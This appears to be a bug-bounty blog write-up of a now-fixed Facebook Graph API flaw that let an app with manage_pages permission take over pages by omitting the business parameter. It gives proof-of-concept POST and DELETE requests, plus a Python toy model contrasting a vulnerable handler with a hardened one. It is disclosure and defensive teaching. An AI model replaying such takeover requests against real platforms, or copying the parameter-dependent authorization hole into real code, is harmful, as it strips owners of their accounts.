A security vulnerability in a Facebook Business Manager endpoint allowed a third-party application with limited permissions to take over any Facebook page, and the victim would permanently lose admin access to the page.
By default, the Facebook application interface does not allow third-party applications to add or modify page roles (manager, editor, analyst, etc.). Third-party applications are allowed to perform operations such as posting statuses on your behalf and publishing photos, but not assigning admin roles: if an application could add or remove admins, it could add an arbitrary user as admin of the page and remove the actual owner permanently.
On the other hand, there is an endpoint for business pages called userpermissions which allows adding or removing page admin roles for users who already manage the Facebook business. The following request makes the target user an admin of the page.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>
 
Response :-
true
After a few minutes of testing I got to know that removing the business parameter from the request didn't throw any error and allowed us to add anyone as a new page admin and delete the actual page admin on a non-business page where the application has the manage_pages permission.
That's it! Whatever the application may be, if it has the manage_pages permission from the admin, it could hack all of your Facebook pages in a fraction of a second.


Final Proof of Concept :-

If the steps are unclear, please watch the accompanying video.

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
 

Removing Victim

Request :-
DELETE /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
That's all! The target page is hacked!
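The root cause described above is an authorization check that is coupled to an optional request parameter: when business is present the server verifies business membership, and when it is omitted the check is skipped entirely. The following added example (not Facebook's code, and not the actual patch) is a toy model of a userpermissions handler that reproduces that bug class next to a hardened version which requires the page's business context, verifies the acting user manages it, and refuses to remove the last remaining admin. All page ids, user ids, tables and function names are constructed for illustration.

```python
"""Toy model of the authorization logic behind a /<page_id>/userpermissions handler.
Added example, not Facebook's code. All identifiers and sample state are constructed."""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class Page:
    page_id: str
    business_id: Optional[str]            # None for an ordinary (non-business) page
    admins: set = field(default_factory=set)


@dataclass
class AppToken:
    """A third-party app's access token, acting for the user who authorized the app."""
    user_id: str
    permissions: set


# Constructed sample state: one business with one manager.
BUSINESS_MANAGERS = {"biz-1": {"u-owner"}}


def sample_pages() -> dict:
    """Fresh copy of the constructed page table: one business page, one plain page."""
    return {
        "page-biz": Page("page-biz", "biz-1", {"u-owner"}),
        "page-plain": Page("page-plain", None, {"u-victim"}),
    }


def _require_manage_pages(token: AppToken) -> None:
    if "manage_pages" not in token.permissions:
        raise PermissionError("manage_pages required")


def _is_business_manager(token: AppToken, business: Optional[str]) -> bool:
    return token.user_id in BUSINESS_MANAGERS.get(business, set())


def vulnerable_set_role(pages: dict, token: AppToken, page_id: str, user: str,
                        business: Optional[str] = None) -> bool:
    """Bug class from the post: the ownership check only runs when `business` is sent."""
    _require_manage_pages(token)
    page = pages[page_id]
    if business is not None:
        # This is the only ownership check, and omitting `business` bypasses it.
        if page.business_id != business or not _is_business_manager(token, business):
            raise PermissionError("not a manager of this business")
    page.admins.add(user)
    return True


def vulnerable_remove_role(pages: dict, token: AppToken, page_id: str, user: str) -> bool:
    """Same defect on removal: any manage_pages token can strip any admin, even the last one."""
    _require_manage_pages(token)
    pages[page_id].admins.discard(user)
    return True


def _require_business_context(token: AppToken, page: Page, business: Optional[str]) -> None:
    """Hardened rule (assumed fix, not Facebook's): role changes need the page's own
    business named explicitly, and the acting user must manage that business."""
    if page.business_id is None or business is None or page.business_id != business:
        raise PermissionError("role changes require the page's business context")
    if not _is_business_manager(token, business):
        raise PermissionError("not a manager of this business")


def hardened_set_role(pages: dict, token: AppToken, page_id: str, user: str,
                      business: Optional[str] = None) -> bool:
    _require_manage_pages(token)
    page = pages[page_id]
    _require_business_context(token, page, business)
    page.admins.add(user)
    return True


def hardened_remove_role(pages: dict, token: AppToken, page_id: str, user: str,
                         business: Optional[str] = None) -> bool:
    _require_manage_pages(token)
    page = pages[page_id]
    _require_business_context(token, page, business)
    if page.admins == {user}:
        # Never allow an API call to leave a page with no admin at all (permanent lockout).
        raise PermissionError("cannot remove the last admin of a page")
    page.admins.discard(user)
    return True


def denied(fn: Callable, *args, **kwargs) -> bool:
    """True if the call is rejected with PermissionError and False if it succeeds."""
    try:
        fn(*args, **kwargs)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    app_for_victim = AppToken("u-victim", {"manage_pages"})   # app authorized by the page admin
    pages = sample_pages()
    vulnerable_set_role(pages, app_for_victim, "page-plain", "u-attacker")
    vulnerable_remove_role(pages, app_for_victim, "page-plain", "u-victim")
    print("vulnerable model, plain page admins after takeover:", pages["page-plain"].admins)
    pages = sample_pages()
    print("hardened model refuses the same call:",
          denied(hardened_set_role, pages, app_for_victim, "page-plain", "u-attacker"))
```

The hardened functions show the general rule rather than this one endpoint: authorization must be decided from the resource's own state (the page's business), not from whether the caller chose to send the parameter that triggers the check.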
 
I reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as part of their bug bounty program.
Even though they have fixed this vulnerability, please be aware of the permissions you grant to any application.
 


The permissions dialog box looks like this (screenshot: manage_pages permission dialog).
If manage_pages is requested, note that the app will be able to manage your pages (post statuses, publish photos, etc.).
Don't worry: you can still modify the permissions you have granted to other apps here.
 
Facebook's reply after a few emails (screenshot: acknowledgement of fix).


17 COMMENTS

  1. The video could be more useful if you slow down. And perhaps add some text about what you're doing.

    Keep up the good work! Enjoy the bounty 😉
